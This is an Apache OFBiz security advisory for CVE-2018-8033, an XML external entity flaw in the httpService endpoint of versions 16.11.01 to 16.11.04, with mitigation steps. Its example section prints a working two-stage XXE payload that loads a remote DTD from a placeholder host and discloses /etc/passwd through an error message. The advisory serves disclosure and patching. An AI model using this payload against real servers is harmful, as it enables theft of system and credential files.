[SECURITY] CVE-2018-8033 Apache OFBiz XXE Vulnerability in HttpEngine

[Taher Alkhateeb <ta...@apache.org>]

Severity:
Important

Vendor:
The Apache Software Foundation

Versions Affected:
OFBiz 16.11.01 to 16.11.04

Description:
The OFBiz HTTP engine (org.apache.ofbiz.service.engine.HttpEngine.java)
handles requests for HTTP services via the /webtools/control/httpService
endpoint. Both POST and GET requests to the httpService endpoint may contain
three parameters: serviceName, serviceMode, and serviceContext.
The exploitation occurs by having DOCTYPEs pointing to external references
that trigger a payload that returns secret information from the host.

Mitigation:
Upgrade to 16.11.05
or manually apply the following commits on branch 16
r1833708
r1836141

Example:
# The following payload may be used:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % request SYSTEM 'http://example.com/evil.xml'>
%request;
%secondstage;
]>
<r>&disclose;</r>

# And then the remote file evil.xml has the following payload:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % secondstage "<!ENTITY disclose SYSTEM 'file:///nonexistent/%file;'>">
%secondstage;
%disclose;

The second stage payload specifies what file to disclose on the OFBiz server.
It instructs the OFBiz server to look for a file in the path /nonexistent/.
The server will throw a "File Not Found" error and then append the target file
(/etc/passwd) to the error message.

Credit:
James Parfet <jamesp at mindpointgroup.com>

References:
http://ofbiz.apache.org/download.html#vulnerabilities